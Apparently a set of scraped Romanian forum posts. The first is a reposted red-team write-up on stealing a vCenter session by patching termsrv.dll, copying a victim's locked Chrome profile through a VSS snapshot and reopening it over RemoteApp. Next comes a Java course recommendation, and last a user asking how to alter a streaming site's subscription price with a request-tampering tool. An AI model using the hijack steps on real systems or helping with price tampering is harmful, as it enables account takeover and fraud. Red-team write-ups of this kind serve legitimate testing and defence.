BLAN\Jack. Jack uses his browser to access a vCenter server in the ADMIN domain. ADMIN\Jack has different credentials than BLAN\Jack when authenticating to the vCenter server. This domain segmentation eliminates several traditional credential theft methods and pushes us into a situation where we might have to keylog or do something else. For this example, let’s also assume that the organization employs hard-token MFA, really restricting our options … way to go defenders! To give you an idea of what MFA brings to the table. Without MFA: mimikatz or keylog –> done! With MFA: mimikatz or keylog, modify system32 files, start and stop services, copy in-use files via VSS, and establish RDP sessions –> done? Multi-RemoteApp Sessions In this example, we’re trying to leverage RemoteApp to gain access to Chrome sessions. However, on unmodified Windows Workstation OSes, we cannot use RemoteApp on a target which has an active session. Below describes an attempted RDP connection to a system with an active session. Detailed in this post, termsrv.dll can be modified to permit multiple Remote Desktop sessions and by extension, RemoteApp sessions. Note, this process requires patching Windows\System32\termsrv.dll which can have major consequences, so beware. With termsrv.dll modified, multiple RemoteApp sessions can now be established while the user is active on the target system. In this example, we’re waiting for ADMIN\Jack to authenticate to the ADMIN vCenter server. So essentially, we’re continuously monitoring Chrome tabs for something vSphere related. To enumerate the tabs I used this PoC. Seeing that Jack has a vSphere tab in Chrome, we assume that session cookies for vCenter are in Jack’s Chrome profile. However, we have a major problem, when Chrome is open, profile files and other goodies are locked and inaccessible. We can get around this by creating a VSS snapshot and copying the profile files to another directory we control. With the copied Chrome profile in C:\users\public\documents\thunderchrome\default\, we start a Chrome instance with the –user-data-dir switch which points to the copied profile path. Just a FYI, when using RemoteApp With xfreerdp, I was unable to open Chrome with /app-cmd so I used c:\windows\explorer.exe instead. RemoteApp automatically opens child windows for you, pretty handy. And finally, the hijacked vCenter session through proxychains and RemoteApp. Sursa: https://ijustwannared.team/2019/03/11/browser-pivot-for-chrome/

https://www.udemy.com/java-the-complete-java-developer-course/ Poti cumpara acest curs. Omul explica destul de bine, totul e organizat pe capitole si iti da challenge-uri de facut dupa fiecare capitol. Cursul are 70 ore si cuprinde mult din Java cum ar fi GUI, Databases, networking, debugging and unit testing etc. Costul e relativ mic(£13) pentru ceea ce iti ofera.

Salutare, stie cineva cum se poate inlocui tamper data de pe mozilla. pentru a modifica pretul la abonament pe antenaplay.ro ?